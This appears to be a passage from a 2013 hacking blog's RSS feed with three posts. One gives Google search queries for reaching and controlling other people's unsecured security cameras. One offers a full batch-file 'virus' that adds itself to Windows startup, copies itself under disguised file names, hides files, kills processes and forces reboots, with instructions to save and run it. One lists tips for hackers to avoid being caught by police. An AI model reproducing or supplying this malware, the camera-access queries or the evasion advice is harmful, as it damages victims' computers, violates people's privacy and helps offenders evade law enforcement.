</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZlbErbpjCIkEB57EVMVMZLTwgsBrQC51Kpy_80E8Y3HgRqyntwN64m_VkoYUn3Ef0tUqEHkv9KcFbOyRKze1kF1KfHo4y-a20l1706SYrQCkf-4FRZkOnczRhYAxGlgdEPBM2kU5uHMTg/s72-c/crme.JPG" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hacking Network CAMERAS</title><link>https://snacksofhacks.blogspot.com/2013/01/hacking-network-cameras.html</link><category>HaCkinG</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 25 Jan 2013 15:37:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-6861069455430006967</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="background-color: #f3f3f3;"&gt;
Hacking Security Cameras:&lt;/span&gt;&lt;/h2&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;span style="font-size: x-large;"&gt;T&lt;/span&gt;&lt;span style="font-size: 14px;"&gt;&lt;b&gt;here exists many security cameras that are used for monitoring places like parking lots, college campus, road traffic&amp;nbsp;etc. With Google, it is possible to hack these cameras so that you can view the images captured by them in real time. For this, all you have to do is just use the following search query in Google. Type in the Google search box exactly as given below and hit enter:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div class="alertBox-info" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 0px; clear: both; color: rgb(70, 123, 158) !important; font-family: Arial, Verdana, sans-serif; font-size: 12px !important; line-height: 1.6em; margin: 0px 0px 35px; outline: 0px; padding: 0px; vertical-align: baseline; z-index: 968;"&gt;
&lt;div style="background-attachment: scroll; background-image: url(http://www.gohacking.com/wp-content/themes/GoHacking-2012/i/information.png); background-position: 20px 50%; background-repeat: no-repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 0px solid; clear: both; margin: 0px 0px 0pt; outline: 0px; padding: 10px 10px 10px 55px; vertical-align: baseline; z-index: 967;"&gt;
&lt;strong style="background-attachment: scroll; background-color: #f3f3f3; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;inurl:”viewerframe?mode=motion”&lt;/strong&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;span style="background-color: #f3f3f3;"&gt;Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. You will see something as follows:&lt;/span&gt;&lt;/div&gt;
&lt;div align="center" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;img alt="Hacking Live Camera" class="aligncenter size-full wp-image-2003" height="480" src="http://www.gohacking.com/wp-content/uploads/2009/12/Livecamera1.jpg" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; clear: both; display: block; margin: 0px auto; outline: 0px; padding: 0px; vertical-align: baseline;" title="" width="562" /&gt;&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;span style="background-color: #f3f3f3;"&gt;As you can see in the above screenshot, you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a&amp;nbsp;less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. In order to access them, just use the following search query:&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div class="alertBox-info" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 0px; clear: both; color: rgb(70, 123, 158) !important; font-family: Arial, Verdana, sans-serif; font-size: 12px !important; line-height: 1.6em; margin: 0px 0px 35px; outline: 0px; padding: 0px; vertical-align: baseline; z-index: 966;"&gt;
&lt;div style="background-attachment: scroll; background-image: url(http://www.gohacking.com/wp-content/themes/GoHacking-2012/i/information.png); background-position: 20px 50%; background-repeat: no-repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 0px solid; clear: both; margin: 0px 0px 0pt; outline: 0px; padding: 10px 10px 10px 55px; vertical-align: baseline; z-index: 965;"&gt;
&lt;strong style="background-attachment: scroll; background-color: #f3f3f3; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;intitle:”Live View / – AXIS”&lt;/strong&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;span style="background-color: #f3f3f3;"&gt;Now, click on any of the search results to access a different set of live cameras. Thus, you have hacked Security Cameras using Google.&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; font-size: 14px; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;b style="background-color: #f3f3f3;"&gt;WARNING&lt;span style="color: #cc0000;"&gt;: This post is for educational purpose only don't use this for criminal purposes..&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;"&gt;
&lt;b&gt;&lt;span style="background-color: #f3f3f3; font-size: large;"&gt;your bloggers KT&amp;amp;KK&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; line-height: 23.796875px; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;"&gt;
&lt;b&gt;&lt;span style="background-color: #f3f3f3; font-size: large;"&gt;____----OUR HACK IS YOURS----____&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Create a Dangerous virus</title><link>https://snacksofhacks.blogspot.com/2013/01/create-dangerous-virus_9.html</link><category>Virus-Creation</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 9 Jan 2013 21:10:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-8273826126208767890</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; line-height: 20.796875px;"&gt;&lt;span style="font-size: x-large;"&gt;I&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px;"&gt;n this post i am going to give you dangerous&amp;nbsp;&lt;/span&gt;&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-color: white; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(201, 26, 55) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(201, 26, 55) !important; cursor: pointer !important; display: inline !important; float: none !important; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px; padding: 0px 0px 1px !important; position: static;"&gt;virus code&lt;/span&gt;&lt;span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px;"&gt;&amp;nbsp;which is written in Batch Programming language.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyeIGS2yib8rDrALgOP7anEb6Vkdutcvi-X1sjvwdj-f6WOvotdCSMbiJyWVcXZJEyxVk4GY4TpTDxYTCF0RjTV3IcqgKKKoSos72NDqc3H7XrMQA-W7M8BVbKcisuRTu-7iifxSvacLs/s1600/computer+virus.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyeIGS2yib8rDrALgOP7anEb6Vkdutcvi-X1sjvwdj-f6WOvotdCSMbiJyWVcXZJEyxVk4GY4TpTDxYTCF0RjTV3IcqgKKKoSos72NDqc3H7XrMQA-W7M8BVbKcisuRTu-7iifxSvacLs/s320/computer+virus.jpg" width="243" /&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.7969px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px;" /&gt;
&lt;span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; line-height: 20.796875px;"&gt;Virus can do:&lt;/span&gt;&lt;br /&gt;
&lt;ul class="ticklist" style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; line-height: 20.796875px; list-style-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDSo-CFz_kFPsRdMPNxCiJw3IgxvgQDljcJNA9Brphp2QjTOZ2mw8OXoaqo2gy-Kt6TLd0v8dzLEew9Q_jUWdmkMQK5DTPj1ouF7r6U2Aj9kz_h4DQklEah05wbrhIQPUUsrjv93er1ic/s15/tickround.jpg); list-style-type: square;"&gt;
&lt;li&gt;Copy itself into startup&lt;/li&gt;
&lt;li&gt;Copy itself over one thousand times into random spots in your computer&lt;/li&gt;
&lt;li&gt;Hide its self and all other created files&lt;/li&gt;
&lt;li&gt;Task kill MSN, Norton,&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(201, 26, 55) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(201, 26, 55) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;"&gt;Windows&lt;/span&gt;&amp;nbsp;Explorer,&amp;nbsp;&lt;span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(201, 26, 55) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(201, 26, 55) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;"&gt;Limewire&lt;/span&gt;.&lt;/li&gt;
&lt;li&gt;Swap the&amp;nbsp;&lt;span class="IL_AD" id="IL_AD9" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(201, 26, 55) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(201, 26, 55) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;"&gt;left mouse&lt;/span&gt;&amp;nbsp;button with the right one&lt;/li&gt;
&lt;li&gt;Opens alert boxes&lt;/li&gt;
&lt;li&gt;Changes the time to 12:00 and shuts down the computer&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;i style="background-color: white; color: #333333; font-family: Arial,Tahoma,Verdana; line-height: 20.7969px;"&gt;&amp;nbsp; Here is&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; border-bottom-color: rgb(201, 26, 55) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(201, 26, 55) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;"&gt;the Code&lt;/span&gt;:&lt;/i&gt;&lt;br /&gt;
&lt;div class="code_box" style="-webkit-box-shadow: rgb(204, 204, 204) 8px 8px 8px; background-color: #dff0ff; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px dashed rgb(187, 187, 187); box-shadow: rgb(204, 204, 204) 8px 8px 8px; font-family: Arial, Tahoma, Verdana; font-size: 13px; height: auto; line-height: 20.796875px; margin: 10px; max-height: 200px; overflow: auto; padding: 5px;"&gt;
@Echo off&lt;br /&gt;
color 4&lt;br /&gt;
title 4&lt;br /&gt;
title R.I.P&lt;br /&gt;
start&lt;br /&gt;
start&lt;br /&gt;
start&lt;br /&gt;
start calc&lt;br /&gt;
copy %0 %Systemroot%\Greatgame &amp;gt; nul&lt;br /&gt;
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ&lt;br /&gt;
/d %systemroot%\Greatgame.bat /f &amp;gt; nul&lt;br /&gt;
copy %0 *.bat &amp;gt; nul&lt;br /&gt;
Attrib +r +h Greatgame.bat&lt;br /&gt;
Attrib +r +h&lt;br /&gt;
RUNDLL32 USER32.DLL.SwapMouseButton&lt;br /&gt;
start calc&lt;br /&gt;
cls&lt;br /&gt;
tskill msnmsgr&lt;br /&gt;
tskill&amp;nbsp;LimeWire&lt;br /&gt;
tskill iexplore&lt;br /&gt;
tskill NMain&lt;br /&gt;
start&lt;br /&gt;
cls&lt;br /&gt;
cd %userprofile%\desktop&lt;br /&gt;
copy Greatgame.bat R.I.P.bat&lt;br /&gt;
copy Greatgame.bat R.I.P.jpg&lt;br /&gt;
copy Greatgame.bat R.I.P.txt&lt;br /&gt;
copy Greatgame.bat R.I.P.exe&lt;br /&gt;
copy Greatgame.bat R.I.P.mov&lt;br /&gt;
copy Greatgame.bat FixVirus.bat&lt;br /&gt;
cd %userprofile%My Documents&lt;br /&gt;
copy Greatgame.bat R.I.P.bat&lt;br /&gt;
copy Greatgame.bat R.I.P.jpg&lt;br /&gt;
copy Greatgame.bat R.I.P.txt&lt;br /&gt;
copy Greatgame.bat R.I.P.exe&lt;br /&gt;
copy Greatgame.bat R.I.P.mov&lt;br /&gt;
copy Greatgame.bat FixVirus.bat&lt;br /&gt;
start&lt;br /&gt;
start calc&lt;br /&gt;
cls&lt;br /&gt;
msg * R.I.P&lt;br /&gt;
msg * R.I.P&lt;br /&gt;
shutdown -r -t 10 -c "&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(201, 26, 55) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: rgb(201, 26, 55) !important; cursor: pointer !important; display: inline !important; float: none !important; padding: 0px 0px 1px !important; position: static;"&gt;VIRUS DETECTED&lt;/span&gt;"&lt;br /&gt;
start&lt;br /&gt;
start&lt;br /&gt;
time 12:00&lt;br /&gt;
:R.I.P&lt;br /&gt;
cd %usernameprofile%\desktop&lt;br /&gt;
copy Greatgame.bat %random%.bat&lt;br /&gt;
goto RIP&lt;/div&gt;
&lt;br style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px;" /&gt;
&lt;span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; line-height: 20.796875px;"&gt;copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px;" /&gt;
&lt;div class="warning_box" style="background-color: #feffd5; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_oue6eXRNfFOSsoIYAtRXo5swD9dLsulJabNChQ45Tz0oCRZGv6tWBm2bjeyERiMGhCuXetjJYNCyYOAMDzoA5Um7QcGm5LDNaSO_dZI7gO48UqHWbhT47wFyy2oUPaIX8IzDLsfG74/s30/warning.jpg); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px dashed rgb(254, 154, 5); font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px; margin: 10px; min-height: 20px; padding: 5px 5px 5px 25px;"&gt;
&amp;nbsp;&amp;nbsp;Be careful..!! if you double click the batch file,then you are the victim of this virus&lt;/div&gt;
&lt;div class="warning_box" style="background-color: #feffd5; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_oue6eXRNfFOSsoIYAtRXo5swD9dLsulJabNChQ45Tz0oCRZGv6tWBm2bjeyERiMGhCuXetjJYNCyYOAMDzoA5Um7QcGm5LDNaSO_dZI7gO48UqHWbhT47wFyy2oUPaIX8IzDLsfG74/s30/warning.jpg); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 1px dashed rgb(254, 154, 5); font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px; margin: 10px; min-height: 20px; padding: 5px 5px 5px 25px;"&gt;
This is strictly for educational use only please don't misuse it.&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: #333333; font-family: Arial, Tahoma, Verdana; font-size: x-small;"&gt;&lt;span style="line-height: 20.796875px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;h4&gt;
&lt;span style="color: #333333; font-family: Arial, Tahoma, Verdana; font-size: x-small;"&gt;&lt;span style="line-height: 20.796875px;"&gt;&lt;span style="font-size: large; font-weight: normal;"&gt;Your bloggers KT,KK&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #333333; font-family: Arial, Tahoma, Verdana; line-height: 20.796875px;"&gt;&lt;span style="font-size: large;"&gt;____----Our hack is yours----____&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20.796875px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyeIGS2yib8rDrALgOP7anEb6Vkdutcvi-X1sjvwdj-f6WOvotdCSMbiJyWVcXZJEyxVk4GY4TpTDxYTCF0RjTV3IcqgKKKoSos72NDqc3H7XrMQA-W7M8BVbKcisuRTu-7iifxSvacLs/s72-c/computer+virus.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to survive as a hacker</title><link>https://snacksofhacks.blogspot.com/2013/01/how-to-survive-as-hackers.html</link><category>HaCkinG</category><category>MuSt C</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 9 Jan 2013 20:18:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-1524952037974680019</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #333333; font-family: Verdana; font-weight: normal; line-height: 19.1875px;"&gt;&lt;span style="background-color: #f3f3f3; font-size: x-large;"&gt;How to survive as a hacker.&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;span style="color: #333333; font-family: Verdana; line-height: 19.1875px;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.careers360.com/careers360_cms/newsimages/image/September2012/Ethical-hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.careers360.com/careers360_cms/newsimages/image/September2012/Ethical-hacking.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;span style="color: #333333; font-family: Verdana; line-height: 19.1875px;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="color: #333333; font-family: Verdana; line-height: 19.1875px;"&gt;&lt;span style="font-size: x-large;"&gt;T&lt;/span&gt;&lt;/span&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;his article will show you some of the top ways the best hackers use to keep themselves hidden and out of jail and survive as a hacker,First of all i want to make one thing clear to all that this is not a site which exite hackers but this is developed to help innocent people not getting trapped by hackers,Most of hackers do not take care of the following things and get caught and result in troubling their selves and also their families so below are 15 tips to&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;survive as a hacker,&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Educational purposes only,written for begineers&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;a href="http://www.blogger.com/blogger.g?blogID=3441350317927969357" name="more" style="color: #a46f38; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;/a&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;/b&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;/b&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;/b&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;h1 style="background-color: #f3f3f3; color: #333333; display: inline !important; font-family: Verdana; line-height: 19.1875px;"&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;How to survive as a hacker - Tips&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h1&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;/b&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never Disclose your Identity:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never tell any body that you are a hacker even your friends or your relatives,you must keep it a secret&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Use Proxy:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never hack without a proxy&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Be Careful:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never let FBI enter your house without a search warrant.&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never Hack from your home:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never hack from your home always use net cafe for these purposes&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Always:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Wave to cops&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Use Fake information:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never use your real name in any sort of conversation or in any signup&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never keep weak passwords:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Do not keep a password which is already present in the dictionary or a password which is very common&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;etc your pet name,Your country name etc&lt;/span&gt;&lt;br /&gt;
